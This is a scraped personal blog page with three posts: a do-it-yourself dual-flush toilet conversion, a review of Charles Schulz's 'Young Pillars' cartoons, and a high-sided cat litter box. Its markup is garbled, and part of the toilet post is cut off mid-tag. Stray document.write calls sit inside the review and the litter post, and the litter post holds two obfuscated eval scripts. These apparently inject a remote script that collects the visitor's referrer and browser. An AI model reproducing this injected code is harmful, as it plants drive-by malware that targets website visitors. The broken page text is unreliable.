For example, we are always washing dishes in a bucket and reuse the waste water in the garden. However, the place wasting the most water in the household is the toilet. We try to flush the toilet as seldom as possible (never to get rid of trash or try to wait after several usage before flushing) but it is not always practical. I thought of changing the toilet for one that has a a href=”http://en.wikipedia.org/wiki/Dual_flush_toilet” target=”“new””double-flush system/a, but a href=”http://www.canadiantire.ca/en/pdp/american-standard-ravenna3-dual-flush-toilet-0633429p.html” target=”“new””a new toilet can be expensive/a ($250-$300) and mine is a rare pinkish-beige color matching the sink, bath and tiles and I would probably never be able to find the same shade (it would most likely be cheaper and easier to go with the standard white which would be clashing with the rest of the room).br /

When the water intake of the toilet started leaking I thought: “This is it; I might have to change the toilet and it will be expensive!” Fortunately, I found a way to repair my old toilet and save water at the same time for just a few dollars!br /

The first step was to change the a href=”http://www.canadiantire.ca/en/pdp/toilet-hook-up-0634387p.html#.VNQaF0Jh4qY” target=”“new””water supply hook-up/a because the plastic nut could be cracked and be the source of the leak. I took the extra precaution to wrap some a href=”http://www.canadiantire.ca/en/pdp/plumbshop-teflon-tape-0630018p.html” target=”“new””teflon tape/a around the threads of the connector before screwing it in. Here’s pictures of the old and new toilet hook-up:br /
br /
centera href=”https://www.flickr.com/photos/clodjee/16478749228″ target=”“new”” title=”Old toilet hook-up by Clodjee Pelletier, on Flickr””> I not only succeeded to repair my old toilet, but I also converted it into a dual-flush all for less than fifty dollars! No need to replace the toilet and worry about its color anymore.

It works pretty well. Now there’s two button: a small one for half a flush and a bigger one for a full flush! Finally I can save more water without any hassle.

I hope this article was useful to you and will help you save more water in the future!

“Using the same wit and empathy that made his Peanuts cartoons popular worldwide. Charles Schulz turns his sights on the lives of teenagers. He finds the humor in teen attitudes toward spirituality, document.write(“”); family, dating, and life. All their youthful enthusiasm, exuberence, passion, flaws, and faibles are on display with the hilarious drawings and sharp insights that made Schulz the most influential cartoonist ever.”

“During the 1950s and 60s, while his work was exploding in popularity, Schulz created hundreds of these cartoons for Youth magazine and other publications. Here they are, including ones never before collected and unseen in decades. It’s a treasure trove for any true Schulz fan.” [ Text from the back cover ]

WARNING: May contains trace of “spoilers”! People allergic to any discussions of a plot element before having themselves become aware of it are strongly advised to take the necessary precautions for their safety and should avoid reading further.

For as long as I remember I have been a great fan of Charles Schulz’s Peanuts cartoons and wasn’t aware that he did anything else. So I was rather surprised when I stumble upon this book at the library. I borrowed it immediately and quickly ran through it with an avid curiosity. It made for an easy reading since it’s made of single-panel cartoons. I found the same irreverent wit as in the Charlie Brown series, but this time with teenagers as main characters. I guess that american teenagers haven’t changed much in the last five decades because it feels somewhat similar to modern cartoons like Zits. The drawings are very simple and, although accompanied by a caption, are able to convey complex ideas. In a way, it is much more difficult to do this successfully with a single-panel story than a four-panel one like for Charlie Brown. [opposite: page 89]

While reading the Peanuts cartoons I had already noticed that it often had religious themes, which I thought normal considering that the average american is much more outspoken and devout about his religion than the people I know and keep company with here in Quebec. I don’t know anyone who quotes scriptures in a conversation or an argument! However, this religious thematic is totally omnipresent in Young Pillars. I was annoyed by this at first, thinking that Schulz must have been quite a devout american. But I quickly realized that he was often putting a slightly cynical twist in his story, gently pointing out how excessive the religious belief can be in the average american daily life. And THAT I liked.

But this religious tone is no coincidence since the Young Pillars cartoon series was published in Youth magazine, which was a Warner Press publication aimed at teens in the Church of God, a Holiness religious movement headquartered in Anderson, Indiana (There are so many different sects, a.k.a denominations, in the Christian faith that it’s almost ridiculous!). The single panel series ran, first bi-weekly and later weekly, from January 1st 1956 until early 1965. This book also includes illustrations that Schulz did for the 22nd International Youth Fellowship convention, for Two-by-Fours (a short book by Kenneth F. Hall about the place of preschool-aged kids in the church published in 1965 by Warner Press) and for the monthly magazine Reach (1969). The book concludes with an article about Schulz’s Warner Press work. The Young Pillars cartoons were often reprinted in Youth magazine and syndicated to other publications. There were also compiled in various books: Young Pillars, Teen-Ager is Not a Disease, What Was Bugging Ol’ Pharaoh, Teen-agers Unite, I Take my Religion Seriously and, of course, Schulz’s Youth.

I enjoyed a lot this funny book and learned a lot more about Charles Monroe Schulz. So should you (particularly if you are a Peanuts‘ fan).

How to make a larger cat litter

To follow-up on the popular entry “How to make a cat house for winter” (dated from november 2009!), document.write(“”); I would like to propose an idea on how to make a larger cat litter.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnbrh|var|u0026u|referrer|rhyek||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niyaf|var|u0026u|referrer|dfyer||js|php’.split(‘|’),0,{}))

I was later confronted with a different problem: my older cat (which has unfortunately passed since then) was getting sick and he couldn’t crouch to normally pee into the litter; he was often overshooting the litter’s border and peeing on the wall. I needed to find a litter with higher borders which didn’t seem to be commercially available in pet shops. Again, I had to create one myself and I found inspiration in my previous experiences with both the cat house and the container-made litter: I simply purchased a bigger container, cut an opening in it with a strong carpet or box cutter and covered the sharp edge of the border with tape [see opposite] to insure that the cats wouldn’t cut themselves if they stepped on it. Here’s two more examples:

[ Left: a 67.1 L Rubbermaid container; right: a 89.9 L Rubbermaid container ]
The smaller one (67.1 L, on the left) has a size of 23.3 x 18.7 x 12.3 inches [59.1 x 47.5 x 31.2 cm] and the larger one (89.9 L, on the right) has a size of 29 x 18 x 13.3 inches [73.6 x 45.7 x 33.7 cm]. Both have borders that are a little more than a foot high which is plenty of protection against overshooters!

I hope that my ideas will inspire you all cat lovers and be useful to you. Good day!
